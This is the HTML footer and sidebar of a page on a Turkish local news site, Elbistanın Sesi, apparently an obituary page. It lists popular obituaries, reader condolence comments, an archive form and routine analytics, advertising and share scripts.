</div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/hasan-tasolar-71-yasinda-h67905.html" title="Hasan Taşolar 71 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/hasan_tasolar_71_yasinda_h67905_14df9.jpg" alt="Hasan Taşolar 71 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hasan-tasolar-71-yasinda-h67905.html" title="" ><span class="en-hit">1.</span> <strong>Hasan Taşolar 71 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sukru-yelegen-70-yasinda-h67987.html" title="Şükrü Yeleğen 70 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/sukru_yelegen_69_yasinda_h67987_74802.jpg" alt="Şükrü Yeleğen 70 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sukru-yelegen-70-yasinda-h67987.html" title="" ><span class="en-hit">2.</span> <strong>Şükrü Yeleğen 70 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/abdil-mezdegi-67-yasinda-h67827.html" title="Abdil Mezdeği 67 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/abdil_mezdegi_67_yasinda_h67827_67918.jpg" alt="Abdil Mezdeği 67 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/abdil-mezdegi-67-yasinda-h67827.html" title="" ><span class="en-hit">3.</span> <strong>Abdil Mezdeği 67 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/semiye-celenk-75-yasinda-h67856.html" title="Semiye Çelenk 75 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/semiye_celenk_75_yasinda_h67856_d8132.jpg" alt="Semiye Çelenk 75 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/semiye-celenk-75-yasinda-h67856.html" title="" ><span class="en-hit">4.</span> <strong>Semiye Çelenk 75 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/turcan-yuksel-60-yasinda-h67809.html" title="Türcan Yüksel 60 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Türcan Yüksel 60 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/turcan-yuksel-60-yasinda-h67809.html" title="" ><span class="en-hit">5.</span> <strong>Türcan Yüksel 60 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/elif-kuyucu-75-yasinda-h68082.html#comment_323345" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-karatas-82-yasinda-h68083.html#comment_323344" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-yanan-ormanlara-2023-adet-fidanla-can-katacak-h68062.html#comment_323343" title="" >dikilmiş bir damla tohumun kötüsü olmaz...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/elif-kuyucu-75-yasinda-h68082.html#comment_323342" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-karatas-82-yasinda-h68083.html#comment_323341" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/elif-kuyucu-75-yasinda-h68082.html#comment_323340" title="" >Rabbim rahmet eylesin, mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mehmet-ceren-h68071.html#comment_323338" title="" >Sevgili Mehmet rahat uyusun,sizlere de sonsuz...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html#comment_323337" title="" >Amanın amanın amanın ! Eyvahlar olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html#comment_323336" title="" >Önce şu Ceyhan caminin yanındaki- milli...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html#comment_323335" title="" >kesinlikle kazandirilmasi gereken bir kale...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html#comment_323334" title="" >İyi turist gelir buraya</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html#comment_323331" title="" >Selçuk hamaminin restoresi bitti galiba....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/feramuz-gok-80-yasinda-h68049.html#comment_323330" title="" >Allah rahmet eylesin gūzel adam</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/hemde-yeni-egitim-ogretim-yili-kurs-programlari-belli-oldu-h68072.html#comment_323329" title="" >Mümkünse ve eğitmenleriniz varsa, Arıcılık...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/gulsum-bolat-74-yasinda-h68070.html#comment_323327" title="" >Merhumeye Allah&#39;tan Rahmet, yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html#comment_323326" title="" >Elbistan&#39;da kız kalesi mı varmış?...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mehmet-ceren-h68071.html#comment_323325" title="" >Allah rahmet eylesin mekanın cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-i-seracilik-ussune-donusturecek-ilk-adim-atildi-h68061.html#comment_323324" title="" >Güzel bir çalışma. Elbistan yöresinde...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html#comment_323323" title="" >kalealtı köyünün içindeki &#39;tarihi...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-durdu-mehmet-cakir-h68069.html#comment_323322" title="" >Mekanı cennet olsun</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" selected>17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" selected>Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="https://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="https://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Mevlüt Sağ 46 yaşında" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="fd98919f948e899c9394938e988e949a9c879889988e94bd9a909c9491d39e9290">[email&#160;protected]</a> <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fmevlut-sag-46-yasinda-h68090.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('68090', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 